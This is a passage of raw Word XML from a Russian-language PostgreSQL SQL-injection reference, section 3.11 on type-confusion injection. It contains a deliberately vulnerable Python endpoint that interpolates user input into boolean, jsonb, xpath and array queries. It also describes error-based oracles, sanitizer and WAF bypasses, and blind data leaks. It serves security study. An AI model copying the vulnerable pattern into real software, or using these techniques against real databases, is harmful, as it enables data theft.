          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тип параметра в коде Python/JS/Java не совпадает с типом колонки в БД, и приложение не валидирует значение перед бросанием в SQL</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app/api/v1/users.py — общий уязвимый паттерн</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@router.get("/users/by-flag")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def by_flag(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    is_active: str,  # типизирован как str, но колонка — BOOLEAN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    role_path: str,  # пойдёт в jsonb-&gt;&gt;{path}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    metadata_xpath: str,  # пойдёт в xpath()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ids: str,  # comma-separated; пойдёт в string_to_array()</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-&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.1 — boolean coercion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q1 = text(f"SELECT * FROM users WHERE is_active = '{is_active}'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.2 — jsonb path injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q2 = text(f"SELECT data-&gt;&gt;'{role_path}' FROM user_profiles WHERE id=1")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.3 — xpath injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q3 = text(f"SELECT xpath('{metadata_xpath}', metadata) FROM users WHERE id=1")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.11.4 — ANY array via string_to_array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q4 = text(f"SELECT * FROM users WHERE id = ANY(string_to_array('{ids}', ',')::int[])")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каждый параметр — отдельная injection-точка с собственной type-семантикой. Общий принцип: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG позволяет приложению свободно конвертировать text↔boolean↔jsonb↔xml↔array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что превращает text-injection точку в более мощный канал, чем выглядит снаружи.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура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3.11.1 Boolean coercion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WHERE bool_col = '$x'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: text-to-bool implicit cast, error-канал через invalid boolean, sanitizer-обход через широкий набор bool-литералов ('t', 'true', 'yes', '1', 'on'), short-circuit-evaluation сюрпризы.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3.11.2 jsonb -&gt; и -&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JSON path operators как DSL: arbitrary key extraction через user-controlled path; jsonpath operators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(PG 12+) с собственным языком query; cast-конфузия через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(data-&gt;&gt;'k')::int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3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XPath 1.0 injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xpath('$expr', xml_col)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; функции XPath (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string-length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для leak в blind-режиме; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmltable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с computed-path; libxml2 ограничения (no external entities).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3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — driver-уровневые особенности маршалирования: psycopg list→ARRAY[], asyncpg list→bytea, pgjdbc через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Type-confusion при unmarshalled scalar в array-контексте. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_to_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как injection-точка через separator. Containment-операторы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@&gt;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&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с user-controlled array.</w:t>
      </w:r>
    </w:p>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vs 3.11.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.2.x — error через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(числовой и identifier cast). 3.11.1 — через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Семантически тот же error-based oracle, но boolean-канал имеет уникальные свойства: BOOLEAN cast принимает namespace из 10+ литералов, что создаёт sanitizer-bypass'ы.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3.8.5 (XML mass dump) vs 3.11.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8.5 — про </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как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">дамп всей БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 3.11.3 — про injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">в XPath-выражение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, которое работает над уже-XML-структурой. Разные точки в pipeline.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 (OOB) vs 3.11.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML с external entity-references (XXE) в большинстве СУБД даёт OOB-канал; в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmlparse(document ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не загружает external DTD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libxml2 настроен с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XML_PARSE_NONET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), поэтому 3.11.3 — про XPath-functions внутри уже-загруженного XML, не про XXE-канал.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vs 3.11.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.5 — про разделение команд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3.11.4 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">scalar vs array маршалирование на драйверном уровне</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ортогонально wire-protocol.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(Filter bypass) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.9 — про encoding/whitespace tricks для обхода input-фильтра. 3.11 — про эксплуатацию правил типов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> прохождения фильтра. Часто комбинируется: 3.9.5 (decode hex) + 3.11.2 (jsonb path) — обход WAF на JSON-key-name через hex-декодирование внутри jsonb_extract_path.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">синтаксическое и семантическое использование типов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не про privileged функции. Все приёмы 3.11.1–3.11.4 работают на PUBLIC — для них нужен только SELECT на целевую таблицу (плюс соответствующий тип колонки: BOOLEAN, JSONB, XML, или контекст с массивами).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Исключение — 3.11.3 Payload C (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">xmltable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с computed path для leak метаданных через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-cast) — требует SUPERUSER или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(как 3.8.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Стандартная структура подразделов 3.11.1–3.11.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">По </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conventions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Суть → Уязвимый код (ссылка на 3.11.0) → Payload + Что доходит → Что произойдёт → Почему работает → Требования → Легитимное использование → Версии → Связанные → Источники.</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Type Conversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основа для всех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Boolean Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для 3.11.1.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JSON Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
